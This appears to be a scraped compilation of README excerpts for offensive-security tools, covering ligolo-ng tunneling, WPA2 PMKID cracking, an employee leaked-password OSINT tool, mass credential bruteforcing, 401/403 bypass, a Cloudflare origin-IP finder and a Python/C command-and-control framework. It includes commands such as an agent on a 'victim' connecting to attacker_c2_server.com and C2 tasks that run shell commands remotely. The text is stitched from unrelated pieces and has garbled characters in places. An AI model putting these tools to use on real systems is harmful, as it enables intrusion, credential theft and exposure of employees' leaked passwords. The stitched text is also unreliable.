If you want to use your own certificates for the proxy server, you can use the -certfile
and -keyfile
parameters.
The proxy/relay can automatically generate self-signed TLS certificates using the -selfcert
option.
The -ignore-cert
option needs to be used with the agent.
Beware of man-in-the-middle attacks! This option should only be used in a test environment or for debugging purposes.
Start the agent on your target (victim) computer (no privileges are required!):
$ ./agent -connect attacker_c2_server.com:11601
If you want to tunnel the connection over a SOCKS5 proxy, you can use the
--socks ip:port
option. You can specify SOCKS credentials using the--socks-user
and--socks-pass
arguments.
A session should appear on the proxy server.
INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"
Use the session
command to select the agent.
ligolo-ng Β» session
? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000
Display the network configuration of the agent using the ifconfig
command:
[Agent : nchatelain@nworkstation] Β» ifconfig
[...]
βββββββββββββββββββββββββββββββββββββββββββββββ
β Interface 3 β
ββββββββββββββββ¬βββββββββββββββββββββββββββββββ€
β Name β wlp3s0 β
β Hardware MAC β de:ad:be:ef:ca:fe β
β MTU β 1500 β
β Flags β up|broadcast|multicast β
β IPv4 Address β 192.168.0.30/24 β
ββββββββββββββββ΄βββββββββββββββββββββββββββββββ
Add a route on the proxy/relay server to the 192.168.0.0/24 agent network.
Linux:
$ sudo ip route add 192.168.0.0/24 dev ligolo
Windows:
> netsh int ipv4 show interfaces
Idx MΓ©t MTU Γtat Nom
--- ---------- ---------- ------------ ---------------------------
25 5 65535 connected ligolo
> route add 192.168.0.0 mask 255.255.255.0 0.0.0.0 if [THE INTERFACE IDX]
Start the tunnel on the proxy:
[Agent : nchatelain@nworkstation] Β» start
[Agent : nchatelain@nworkstation] Β» INFO[0690] Starting tunnel to nchatelain@nworkstation
You can now access the 192.168.0.0/24 agent network from the proxy server.
$ nmap 192.168.0.0/24 -v -sV -n
[...]
$ rdesktop 192.168.0.123
[...]
You can listen to ports on the agent and redirect connections to your control/proxy server.
In a ligolo session, use the listener_add
command.
The following example will create a TCP listening socket on the agent (0.0.0.0:1234) and redirect connections to the 4321 port of the proxy server.
[Agent : nchatelain@nworkstation] Β» listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp
INFO[1208] Listener created on remote agent!
On the proxy
:
$ nc -lvp 4321
When a connection is made on the TCP port 1234
of the agent, nc
will receive the connection.
This is very useful when using reverse tcp/udp payloads.
You can view currently running listeners using the listener_list
command and stop them using the listener_stop [ID]
command:
[Agent : nchatelain@nworkstation] Β» listener_list
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β Active listeners β
βββββ¬ββββββββββββββββββββββββββ¬βββββ ββββββββββββββββββββ¬βββββββββββββββββββββββββ€
β # β AGENT β AGENT LISTENER ADDRESS β PROXY REDIRECT ADDRESS β
βββββΌββββββββββββββββββββββββββΌβββββββββββββββββββββββββΌββββββββββββββββββββββββ& #9508;
β 0 β nchatelain@nworkstation β 0.0.0.0:1234 β 127.0.0.1:4321 β
βββββ΄ββββββββββββββββββββββββββ΄βββββββββββββββββββββββββ΄βββββββββββββββββββββββββ
[Agent : nchatelain@nworkstation] Β» listener_stop 0
INFO[1505] Listener closed.
On the agent side, no! Everything can be performed without administrative access.
However, on your relay/proxy server, you need to be able to create a tun interface.
You can easily hit more than 100 Mbits/sec. Here is a test using iperf
from a 200Mbits/s server to a 200Mbits/s connection.
$ iperf3 -c 10.10.0.1 -p 24483
Connecting to host 10.10.0.1, port 24483
[ 5] local 10.10.0.224 port 50654 connected to 10.10.0.1 port 24483
[ ID] Interval Transfer Bitrate Retr Cwnd
[ 5] 0.00-1.00 sec 12.5 MBytes 105 Mbits/sec 0 164 KBytes
[ 5] 1.00-2.00 sec 12.7 MBytes 107 Mbits/sec 0 263 KBytes
[ 5] 2.00-3.00 sec 12.4 MBytes 104 Mbits/sec 0 263 KBytes
[ 5] 3.00-4.00 sec 12.7 MBytes 106 Mbits/sec 0 263 KBytes
[ 5] 4.00-5.00 sec 13.1 MBytes 110 Mbits/sec 2 134 KBytes
[ 5] 5.00-6.00 sec 13.4 MBytes 113 Mbits/sec 0 147 KBytes
[ 5] 6.00-7.00 sec 12.6 MBytes 105 Mbits/sec 0 158 KBytes
[ 5] 7.00-8.00 sec 12.1 MBytes 101 Mbits/sec 0 173 KBytes
[ 5] 8. 00-9.00 sec 12.7 MBytes 106 Mbits/sec 0 182 KBytes
[ 5] 9.00-10.00 sec 12.6 MBytes 106 Mbits/sec 0 188 KBytes
- - - - - - - - - - - - - - - - - - - - - - - - -
[ ID] Interval Transfer Bitrate Retr
[ 5] 0.00-10.00 sec 127 MBytes 106 Mbits/sec 2 sender
[ 5] 0.00-10.08 sec 125 MBytes 104 Mbits/sec receiver
Because the agent is running without privileges, it's not possible to forward raw packets. When you perform a NMAP SYN-SCAN, a TCP connect() is performed on the agent.
When using nmap, you should use --unprivileged
or -PE
to avoid false positives.
Rayder is a command-line tool designed to simplify the orchestration and execution of workflows. It allows you to define a series of modules in a YAML file, each consisting of commands to be executed. Rayder helps you automate complex processes, making it easy to streamline repetitive modules and execute them parallelly if the commands do not depend on each other.
To install Rayder, ensure you have Go (1.16 or higher) installed on your system. Then, run the following command:
go install github.com/devanshbatham/rayder@v0.0.4
Rayder offers a straightforward way to execute workflows defined in YAML files. Use the following command:
rayder -w path/to/workflow.yaml
A workflow is defined in a YAML file with the following structure:
vars:
VAR_NAME: value
# Add more variables...
parallel: true|false
modules:
- name: task-name
cmds:
- command-1
- command-2
# Add more commands...
silent: true|false
# Add more modules...
Rayder allows you to use variables in your workflow configuration, making it easy to parameterize your commands and achieve more flexibility. You can define variables in the vars
section of your workflow YAML file. These variables can then be referenced within your command strings using double curly braces ({{}}
).
To define variables, add them to the vars
section of your workflow YAML file:
vars:
VAR_NAME: value
ANOTHER_VAR: another_value
# Add more variables...
You can reference variables within your command strings using double curly braces ({{}}
). For example, if you defined a variable OUTPUT_DIR
, you can use it like this:
modules:
- name: example-task
cmds:
- echo "Output directory {{OUTPUT_DIR}}"
You can also supply values for variables via the command line when executing your workflow. Use the format VARIABLE_NAME=value
to provide values for specific variables. For example:
rayder -w path/to/workflow.yaml VAR_NAME=new_value ANOTHER_VAR=updated_value
If you don't provide values for variables via the command line, Rayder will automatically apply default values defined in the vars
section of your workflow YAML file.
Remember that variables supplied via the command line will override the default values defined in the YAML configuration.
Here's an example of how you can define, reference, and supply variables in your workflow configuration:
vars:
ORG: "example.org"
OUTPUT_DIR: "results"
modules:
- name: example-task
cmds:
- echo "Organization {{ORG}}"
- echo "Output directory {{OUTPUT_DIR}}"
When executing the workflow, you can provide values for ORG
and OUTPUT_DIR
via the command line like this:
rayder -w path/to/workflow.yaml ORG=custom_org OUTPUT_DIR=custom_results_dir
This will override the default values and use the provided values for these variables.
Here's an example workflow configuration tailored for reverse whois recon and processing the root domains into subdomains, resolving them and checking which ones are alive:
vars:
ORG: "Acme, Inc"
OUTPUT_DIR: "results-dir"
parallel: false
modules:
- name: reverse-whois
silent: false
cmds:
- mkdir -p {{OUTPUT_DIR}}
- revwhoix -k "{{ORG}}" > {{OUTPUT_DIR}}/root-domains.txt
- name: finding-subdomains
cmds:
- xargs -I {} -a {{OUTPUT_DIR}}/root-domains.txt echo "subfinder -d {} -o {}.out" | quaithe -workers 30
silent: false
- name: cleaning-subdomains
cmds:
- cat *.out > {{OUTPUT_DIR}}/root-subdomains.txt
- rm *.out
silent: true
- name: resolving-subdomains
cmds:
- cat {{OUTPUT_DIR}}/root-subdomains.txt | dnsx -silent -threads 100 -o {{OUTPUT_DIR}}/resolved-subdomains.txt
silent: false
- name: checking-alive-subdomains
cmds:
- cat {{OUTPUT_DIR}}/resolved-subdomains.txt | httpx -silent -threads 100 0 -o {{OUTPUT_DIR}}/alive-subdomains.txt
silent: false
To execute the above workflow, run the following command:
rayder -w path/to/reverse-whois.yaml ORG="Yelp, Inc" OUTPUT_DIR=results
The parallel
field in the workflow configuration determines whether modules should be executed in parallel or sequentially. Setting parallel
to true
allows modules to run concurrently, making it suitable for modules with no dependencies. When set to false
, modules will execute one after another.
Explore a collection of sample workflows and examples in the Rayder workflows repository. Stay tuned for more additions!
Inspiration of this project comes from Awesome taskfile project.
This program is a tool written in Python to recover the pre-shared key of a WPA2 WiFi network without any de-authentication or requiring any clients to be on the network. It targets the weakness of certain access points advertising the PMKID value in EAPOL message 1.
python pmkidcracker.py -s <SSID> -ap <APMAC> -c <CLIENTMAC> -p <PMKID> -w <WORDLIST> -t <THREADS(Optional)>
NOTE: apmac, clientmac, pmkid must be a hexstring, e.g b8621f50edd9
The two main formulas to obtain a PMKID are as follows:
This is just for understanding, both are already implemented in find_pw_chunk
and calculate_pmkid
.
Below are the steps to obtain the PMKID manually by inspecting the packets in WireShark.
*You may use Hcxtools or Bettercap to quickly obtain the PMKID without the below steps. The manual way is for understanding.
To obtain the PMKID manually from wireshark, put your wireless antenna in monitor mode, start capturing all packets with airodump-ng or similar tools. Then connect to the AP using an invalid password to capture the EAPOL 1 handshake message. Follow the next 3 steps to obtain the fields needed for the arguments.
Open the pcap in WireShark:
wlan_rsna_eapol.keydes.msgnr == 1
in WireShark to display only EAPOL message 1 packets.If access point is vulnerable, you should see the PMKID value like the below screenshot:
This tool is for educational and testing purposes only. Do not use it to exploit the vulnerability on any network that you do not own or have permission to test. The authors of this script are not responsible for any misuse or damage caused by its use.
Β
This is a tool designed for Open Source Intelligence (OSINT) purposes, which helps to gather information about employees of a company.
The tool starts by searching through LinkedIn to obtain a list of employees of the company. Then, it looks for their social network profiles to find their personal email addresses. Finally, it uses those email addresses to search through a custom COMB database to retrieve leaked passwords. You an easily add yours and connect to through the tool.
To use this tool, you'll need to have Python 3.10 installed on your machine. Clone this repository to your local machine and install the required dependencies using pip in the cli folder:
cd cli
pip install -r requirements.txt
We know that there is a problem when installing the tool due to the psycopg2 binary. If you run into this problem, you can solve it running:
cd cli
python3 -m pip install psycopg2-binary`
To use the tool, simply run the following command:
python3 cli/emploleaks.py
If everything went well during the installation, you will be able to start using EmploLeaks:
___________ .__ .__ __
\_ _____/ _____ ______ | | ____ | | ____ _____ | | __ ______
| __)_ / \____ \| | / _ \| | _/ __ \__ \ | |/ / / ___/
| \ Y Y \ |_> > |_( <_> ) |_\ ___/ / __ \| < \___ \
/_______ /__|_| / __/|____/\____/|____/\___ >____ /__|_ \/____ >
\/ \/|__| \/ \/ \/ \/
OSINT tool Γ°ΕΈβ’Β΅ to chain multiple apis
emploleaks>
Right now, the tool supports two functionalities:
First, you must set the plugin to use, which in this case is linkedin. After, you should set your authentication tokens and the run the impersonate process:
emploleaks> use --plugin linkedin
emploleaks(linkedin)> setopt JSESSIONID
JSESSIONID:
[+] Updating value successfull
emploleaks(linkedin)> setopt li-at
li-at:
[+] Updating value successfull
emploleaks(linkedin)> show options
Module options:
Name Current Setting Required Description
---------- ----------------------------------- ---------- -----------------------------------
hide yes no hide the JSESSIONID field
JSESSIONID ************************** no active cookie session in browser #1
li-at AQEDAQ74B0YEUS-_AAABilIFFBsAAAGKdhG no active cookie session in browser #1
YG00AxGP34jz1bRrgAcxkXm9RPNeYIAXz3M
cycrQm5FB6lJ-Tezn8GGAsnl_GRpEANRdPI
lWTRJJGF9vbv5yZHKOeze_WCHoOpe4ylvET
kyCyfN58SNNH
emploleaks(linkedin)> run i mpersonate
[+] Using cookies from the browser
Setting for first time JSESSIONID
Setting for first time li_at
li_at and JSESSIONID are the authentication cookies of your LinkedIn session on the browser. You can use the Web Developer Tools to get it, just sign-in normally at LinkedIn and press right click and Inspect, those cookies will be in the Storage tab.
Now that the module is configured, you can run it and start gathering information from the company:
We created a custom workflow, where with the information retrieved by Linkedin, we try to match employees' personal emails to potential leaked passwords. In this case, you can connect to a database (in our case we have a custom indexed COMB database) using the connect command, as it is shown below:
emploleaks(linkedin)> connect --user myuser --passwd mypass123 --dbname mydbname --host 1.2.3.4
[+] Connecting to the Leak Database...
[*] version: PostgreSQL 12.15
Once it's connected, you can run the workflow. With all the users gathered, the tool will try to search in the database if a leaked credential is affecting someone:
An imortant aspect of this project is the use of the indexed COMB database, to build your version you need to download the torrent first. Be careful, because the files and the indexed version downloaded requires, at least, 400 GB of disk space available.
Once the torrent has been completelly downloaded you will get a file folder as following:
Γ’βΕΓ’ββ¬Γ’ββ¬ count_total.sh
Γ’βΕΓ’ββ¬Γ’ββ¬ data
Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ 0
Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ 1
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ 0
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ 1
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ 2
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ 3
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ 4
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’&β¬ 5
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ 6
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ 7
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ 8
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ 9
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ a
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ b
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ c
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ d
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ e
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ f
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ g
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ h
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ i
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ j
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ k
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ l
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ m
Γ’ββ Γ’ββ Γ’βΕΓ’ β¬Γ’ββ¬ n
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ o
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ p
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ q
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ r
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ s
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ symbols
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ t
At this point, you could import all those files with the command create_db
:
We are integrating other public sites and applications that may offer about a leaked credential. We may not be able to see the plaintext password, but it will give an insight if the user has any compromised credential:
Also, we will be focusing on gathering even more information from public sources of every employee. Do you have any idea in mind? Don't hesitate to reach us:
Or you con DM at @pastacls or @gaaabifranco on Twitter.
Little AV/EDR Evasion Lab for training & learning purposes. (οοΈ under construction..)β
____ _ _____ ____ ____ ___ __ _____ _
| __ ) ___ ___| |_ | ____| _ \| _ \ / _ \ / _| |_ _| |__ ___
| _ \ / _ \/ __| __| | _| | | | | |_) | | | | | |_ | | | '_ \ / _ \
| |_) | __/\__ \ |_ | |___| |_| | _ < | |_| | _| | | | | | | __/
|____/_\___||___/\__| |_____|____/|_| \_\ \___/|_| |_| |_| |_|\___|
| \/ | __ _ _ __| | _____| |_
| |\/| |/ _` | '__| |/ / _ \ __|
| | | | (_| | | | < __/ |_ Yazidou - github.com/Xacone
|_| |_|\__,_|_| |_|\_\___|\__|
BestEDROfTheMarket is a naive user-mode EDR (Endpoint Detection and Response) project, designed to serve as a testing ground for understanding and bypassing EDR's user-mode detection methods that are frequently used by these security solutions.
These techniques are mainly based on a dynamic analysis of the target process state (memory, API calls, etc.),
Feel free to check this short article I wrote that describe the interception and analysis methods implemented by the EDR.
In progress:
Usage: BestEdrOfTheMarket.exe [args]
/help Shows this help message and quit
/v Verbosity
/iat IAT hooking
/stack Threads call stack monitoring
/nt Inline Nt-level hooking
/k32 Inline Kernel32/Kernelbase hooking
/ssn SSN crushing
BestEdrOfTheMarket.exe /stack /v /k32
BestEdrOfTheMarket.exe /stack /nt
BestEdrOfTheMarket.exe /iat
MacMaster is a versatile command line tool designed to change the MAC address of network interfaces on your system. It provides a simple yet powerful solution for network anonymity and testing.
MacMaster requires Python 3.6 or later.
$ git clone https://github.com/HalilDeniz/MacMaster.git
cd MacMaster
$ python setup.py install
$ macmaster --help
usage: macmaster [-h] [--interface INTERFACE] [--version]
[--random | --newmac NEWMAC | --customoui CUSTOMOUI | --reset]
MacMaster: Mac Address Changer
options:
-h, --help show this help message and exit
--interface INTERFACE, -i INTERFACE
Network interface to change MAC address
--version, -V Show the version of the program
--random, -r Set a random MAC address
--newmac NEWMAC, -nm NEWMAC
Set a specific MAC address
--customoui CUSTOMOUI, -co CUSTOMOUI
Set a custom OUI for the MAC address
--reset, -rs Reset MAC address to the original value
--interface
, -i
: Specify the network interface.--random
, -r
: Set a random MAC address.--newmac
, -nm
: Set a specific MAC address.--customoui
, -co
: Set a custom OUI for the MAC address.--reset
, -rs
: Reset MAC address to the original value.--version
, -V
: Show the version of the program.$ macmaster.py -i eth0 -nm 00:11:22:33:44:55
$ macmaster.py -i eth0 -r
$ macmaster.py -i eth0 -rs
$ macmaster.py -i eth0 -co 08:00:27
$ macmaster.py -V
Replace eth0
with your desired network interface.
You must run this script as root or use sudo to run this script for it to work properly. This is because changing a MAC address requires root privileges.
Contributions are welcome! To contribute to MacMaster, follow these steps:
For any inquiries or further information, you can reach me through the following channels:
NetProbe is a tool you can use to scan for devices on your network. The program sends ARP requests to any IP address on your network and lists the IP addresses, MAC addresses, manufacturers, and device models of the responding devices.
You can download the program from the GitHub page.
$ git clone https://github.com/HalilDeniz/NetProbe.git
To install the required libraries, run the following command:
$ pip install -r requirements.txt
To run the program, use the following command:
$ python3 netprobe.py [-h] -t [...] -i [...] [-l] [-o] [-m] [-r] [-s]
-h
,--help
: show this help message and exit-t
,--target
: Target IP address or subnet (default: 192.168.1.0/24)-i
,--interface
: Interface to use (default: None)-l
,--live
: Enable live tracking of devices-o
,--output
: Output file to save the results-m
,--manufacturer
: Filter by manufacturer (e.g., 'Apple')-r
,--ip-range
: Filter by IP range (e.g., '192.168.1.0/24')-s
,--scan-rate
: Scan rate in seconds (default: 5)$ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -o results.txt -l
$ python3 netprobe.py --help
usage: netprobe.py [-h] -t [...] -i [...] [-l] [-o] [-m] [-r] [-s]
NetProbe: Network Scanner Tool
options:
-h, --help show this help message and exit
-t [ ...], --target [ ...]
Target IP address or subnet (default: 192.168.1.0/24)
-i [ ...], --interface [ ...]
Interface to use (default: None)
-l, --live Enable live tracking of devices
-o , --output Output file to save the results
-m , --manufacturer Filter by manufacturer (e.g., 'Apple')
-r , --ip-range Filter by IP range (e.g., '192.168.1.0/24')
-s , --scan-rate Scan rate in seconds (default: 5)
$ python3 netprobe.py
You can enable live tracking of devices on your network by using the -l
or --live
flag. This will continuously update the device list every 5 seconds.
$ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -l
You can save the scan results to a file by using the -o
or --output
flag followed by the desired output file name.
$ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -l -o results.txt
ββββββββββββββββ³ββββββββββββββββββββ³ββββββββββββββ³βββββββββββββββββββββββββββββββ
β IP Address β MAC Address β Packet Size β Manufacturer β
β‘ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ©
β 192.168.1.1 β **:6e:**:97:**:28 β 102 β ASUSTek COMPUTER INC. β
β 192.168.1.3 β 00:**:22:**:12:** β 102 β InPro Comm β
β 192.168.1.2 β **:32:**:bf:**:00 β 102 β Xiaomi Communications Co Ltd β
β 192.168.1.98 β d4:**:64:**:5c:** β 102 β ASUSTek COMPUTER INC. β
β 192.168.1.25 β **:49:**:00:**:38 β 102 β Unknown β
ββββββββββββββββ΄ββββββββββββββββββββ΄ββββββββββββββ΄βββββββββββββββββββββββββββββββ
If you have any questions, suggestions, or feedback about the program, please feel free to reach out to me through any of the following platforms:
This program is released under the MIT LICENSE. See LICENSE for more information.
CloakQuest3r is a powerful Python tool meticulously crafted to uncover the true IP address of websites safeguarded by Cloudflare, a widely adopted web security and performance enhancement service. Its core mission is to accurately discern the actual IP address of web servers that are concealed behind Cloudflare's protective shield. Subdomain scanning is employed as a key technique in this pursuit. This tool is an invaluable resource for penetration testers, security professionals, and web administrators seeking to perform comprehensive security assessments and identify vulnerabilities that may be obscured by Cloudflare's security measures.
Key Features:
Real IP Detection: CloakQuest3r excels in the art of discovering the real IP address of web servers employing Cloudflare's services. This crucial information is paramount for conducting comprehensive penetration tests and ensuring the security of web assets.
Subdomain Scanning: Subdomain scanning is harnessed as a fundamental component in the process of finding the real IP address. It aids in the identification of the actual server responsible for hosting the website and its associated subdomains.
Threaded Scanning: To enhance efficiency and expedite the real IP detection process, CloakQuest3r utilizes threading. This feature enables scanning of a substantial list of subdomains without significantly extending the execution time.
Detailed Reporting: The tool provides comprehensive output, including the total number of subdomains scanned, the total number of subdomains found, and the time taken for the scan. Any real IP addresses unveiled during the process are also presented, facilitating in-depth analysis and penetration testing.
With CloakQuest3r, you can confidently evaluate website security, unveil hidden vulnerabilities, and secure your web assets by disclosing the true IP address concealed behind Cloudflare's protective layers.
- Still in the development phase, sometimes it can't detect the real Ip.
- CloakQuest3r combines multiple indicators to uncover real IP addresses behind Cloudflare. While subdomain scanning is a part of the process, we do not assume that all subdomains' A records point to the target host. The tool is designed to provide valuable insights but may not work in every scenario. We welcome any specific suggestions for improvement.
1. False Negatives: CloakReveal3r may not always accurately identify the real IP address behind Cloudflare, particularly for websites with complex network configurations or strict security measures.
2. Dynamic Environments: Websites' infrastructure and configurations can change over time. The tool may not capture these changes, potentially leading to outdated information.
3. Subdomain Variation: While the tool scans subdomains, it doesn't guarantee that all subdomains' A records will point to the pri mary host. Some subdomains may also be protected by Cloudflare.
How to Use:
Run CloudScan with a single command-line argument: the target domain you want to analyze.
git clone https://github.com/spyboy-productions/CloakQuest3r.git
cd CloakQuest3r
pip3 install -r requirements.txt
python cloakquest3r.py example.com
The tool will check if the website is using Cloudflare. If not, it will inform you that subdomain scanning is unnecessary.
If Cloudflare is detected, CloudScan will scan for subdomains and identify their real IP addresses.
You will receive detailed output, including the number of subdomains scanned, the total number of subdomains found, and the time taken for the scan.
Any real IP addresses found will be displayed, allowing you to conduct further analysis and penetration testing.
CloudScan simplifies the process of assessing website security by providing a clear, organized, and informative report. Use it to enhance your security assessments, identify potential vulnerabilities, and secure your web assets.
Run it online on replit.com : https://replit.com/@spyb0y/CloakQuest3r
The summary of the changelog since the 2023.3 release from August is:
Mass bruteforce network protocols
Simple personal script to quickly mass bruteforce common services in a large scale of network.
It will check for default credentials on ftp, ssh, mysql, mssql...etc.
This was made for authorized red team penetration testing purpose only.
masscan
(faster than nmap) to find alive hosts with common ports from network segment.masscan
result.hydra
commands to automatically bruteforce supported network services on devices.Kali linux
or any preferred linux distributionPython 3.10+
# Clone the repo
git clone https://github.com/opabravo/mass-bruter
cd mass-bruter
# Install required tools for the script
apt update && apt install seclists masscan hydra
Private ip range :
10.0.0.0/8
,192.168.0.0/16
,172.16.0.0/12
Save masscan results under ./result/masscan/
, with the format masscan_<name>.<ext>
Ex: masscan_192.168.0.0-16.txt
Example command:
masscan -p 3306,1433,21,22,23,445,3389,5900,6379,27017,5432,5984,11211,9200,1521 172.16.0.0/12 | tee ./result/masscan/masscan_test.txt
Example Resume Command:
masscan --resume paused.conf | tee -a ./result/masscan/masscan_test.txt
Command Options
βββ(rootγΏroot)-[~/mass-bruter]
ββ# python3 mass_bruteforce.py
Usage: [OPTIONS]
Mass Bruteforce Script
Options:
-q, --quick Quick mode (Only brute telnet, ssh, ftp , mysql,
mssql, postgres, oracle)
-a, --all Brute all services(Very Slow)
-s, --show Show result with successful login
-f, --file-path PATH The directory or file that contains masscan result
[default: ./result/masscan/]
--help Show this message and exit.
Quick Bruteforce Example:
python3 mass_bruteforce.py -q -f ~/masscan_script.txt
Fetch cracked credentials:
python3 mass_bruteforce.py -s
dpl4hydra
Any contributions are welcomed!
Forbidden Buster is a tool designed to automate various techniques in order to bypass HTTP 401 and 403 response codes and gain access to unauthorized areas in the system. This code is made for security enthusiasts and professionals only. Use it at your own risk.
Install requirements
pip3 install -r requirements.txt
Run the script
python3 forbidden_buster.py -u http://example.com
Forbidden Buster accepts the following arguments:
-h, --help show this help message and exit
-u URL, --url URL Full path to be used
-m METHOD, --method METHOD
Method to be used. Default is GET
-H HEADER, --header HEADER
Add a custom header
-d DATA, --data DATA Add data to requset body. JSON is supported with escaping
-p PROXY, --proxy PROXY
Use Proxy
--rate-limit RATE_LIMIT
Rate limit (calls per second)
--include-unicode Include Unicode fuzzing (stressful)
--include-user-agent Include User-Agent fuzzing (stressful)
Example Usage:
python3 forbidden_buster.py --url "http://example.com/secret" --method POST --header "Authorization: Bearer XXX" --data '{\"key\":\"value\"}' --proxy "http://proxy.example.com" --rate-limit 5 --include-unicode --include-user-agent
Web Path Finder is a Python program that provides information about a website. It retrieves various details such as page title, last updated date, DNS information, subdomains, firewall names, technologies used, certificate information, and more.Β
Clone the repository:
git clone https://github.com/HalilDeniz/PathFinder.git
Install the required packages:
pip install -r requirements.txt
This will install all the required modules and their respective versions.
Run the program using the following command:
Γ’βΕΓ’ββ¬Γ’ββ¬(rootΓ°ΕΈββ¬denizhalil)-[~/MyProjects/]
Γ’ββΓ’ββ¬# python3 web-info-explorer.py --help
usage: wpathFinder.py [-h] url
Web Information Program
positional arguments:
url Enter the site URL
options:
-h, --help show this help message and exit
Replace <url>
with the URL of the website you want to explore.
Here is an example output of running the program:
Γ’βΕΓ’ββ¬Γ’ββ¬(rootΓ°ΕΈββ¬denizhalil)-[~/MyProjects/]
Γ’ββΓ’ββ¬# python3 pathFinder.py https://www.facebook.com/
Site Information:
Title: Facebook - Login or Register
Last Updated Date: None
First Creation Date: 1997-03-29 05:00:00
Dns Information: []
Sub Branches: ['157']
Firewall Names: []
Technologies Used: javascript, php, css, html, react
Certificate Information:
Certificate Issuer: US
Certificate Start Date: 2023-02-07 00:00:00
Certificate Expiration Date: 2023-05-08 23:59:59
Certificate Validity Period (Days): 90
Bypassed JavaScript content:
</ div> Contributions are welcome! To contribute to PathFinder, follow these steps:
This project is licensed under the MIT License - see the LICENSE file for details.
For any inquiries or further information, you can reach me through the following channels:
Commander is a command and control framework (C2) written in Python, Flask and SQLite. ItΒ comes with two agents written in Python and C.
Under Continuous Development
Not script-kiddie friendly
Python >= 3.6 is required to run and the following dependencies
Linux for the admin.py and c2_server.py. (Untested for windows)
apt install libcurl4-openssl-dev libb64-dev
apt install openssl
pip3 install -r requirements.txt
First create the required certs and keys
# if you want to secure your key with a passphrase exclude the -nodes
openssl req -x509 -newkey rsa:4096 -keyout server.key -out server.crt -days 365 -nodes
Start the admin.py module first in order to create a local sqlite db file
python3 admin.py
Continue by running the server
python3 c2_server.py
And last the agent. For the python case agent you can just run it but in the case of the C agent you need to compile it first.
# python agent
python3 agent.py
# C agent
gcc agent.c -o agent -lcurl -lb64
./agent
By default both the Agents and the server are running over TLS and base64. The communication point is set to 127.0.0.1:5000 and in case a different point is needed it should be changed in Agents source files.
As the Operator/Administrator you can use the following commands to control your agents
Commands:
task add arg c2-commands
Add a task to an agent, to a group or on all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
c2-commands: possible values are c2-register c2-shell c2-sleep c2-quit
c2-register: Triggers the agent to register again.
c2-shell cmd: It takes an shell command for the agent to execute. eg. c2-shell whoami
cmd: The command to execute.
c2-sleep: Configure the interval that an agent will check for tasks.
c2-session port: Instructs the agent to open a shell session with the server to this port.
port: The port to connect to. If it is not provided it defaults to 5555.
c2-quit: Forces an agent to quit.
task delete arg
Delete a task from an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show agent arg
Displays inf o for all the availiable agents or for specific agent.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show task arg
Displays the task of an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show result arg
Displays the history/result of an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
find active agents
Drops the database so that the active agents will be registered again.
exit
Bye Bye!
Sessions:
sessions server arg [port]
Controls a session handler.
arg: can have the following values: 'start' , 'stop' 'status'
port: port is optional for the start arg and if it is not provided it defaults to 5555. This argument defines the port of the sessions server
sessions select arg
Select in which session to attach.
arg: the index from the 'sessions list' result
sessions close arg
Close a session.
arg: the index from the 'sessions list' result
sessions list
Displays the availiable sessions
local-ls directory
Lists on your host the files on the selected directory
download 'file'
Downloads the 'file' locally on the current directory
upload 'file'
Uploads a file in the directory where the agent currently is
Special attention should be given to the 'find active agents' command. This command deletes all the tables and creates them again. It might sound scary but it is not, at least that is what i believe :P
